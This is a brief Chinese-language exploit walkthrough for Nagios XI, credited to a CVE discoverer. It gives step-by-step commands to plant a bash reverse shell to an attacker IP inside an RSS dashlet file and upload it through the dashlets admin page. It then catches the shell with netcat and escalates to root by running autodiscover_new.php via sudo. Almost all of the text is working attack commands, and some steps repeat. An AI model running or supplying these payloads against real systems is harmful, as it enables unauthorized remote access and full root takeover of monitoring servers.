CVE 发现者:K. Wahab (Neo`X)
本例中使用 RSS Dashlet。
在 dashlet 的 .inc.php 文件 "/usr/local/nagiosxi/html/includes/dashlets/" 中添加以下内容:
exec('/bin/bash -i >& /dev/tcp/<攻击者 IP>/4441 0>&1);
在攻击者机器上启动 Netcat 监听服务:
nc -nlvp 4441
执行以下命令以提升权限并以 root 身份接收连接:
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
前往 "dashlets" 管理页面下载一个 Dashlet:
http://TARGET_IP/nagiosxi/admin/dashlets.php?download=rss_dashlet
修改 *.inc.php 文件:
exec("sleep 30 && /bin/bash -c '/bin/bash -i >& /dev/tcp/<攻击者 IP>/4441 0>&1'");

在攻击者机器上启动 Netcat 监听服务:
nc -nlvp 4441
在 dashlets 管理页面上传恶意 dashlet,并等待以 APACHE 用户身份接收连接。
执行以下命令以提升权限并以 root 身份接收连接:
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
(注意:执行命令后你将收到 APACHE 用户的连接,使用 CTRL+C 退出并多次重新启动监听器)
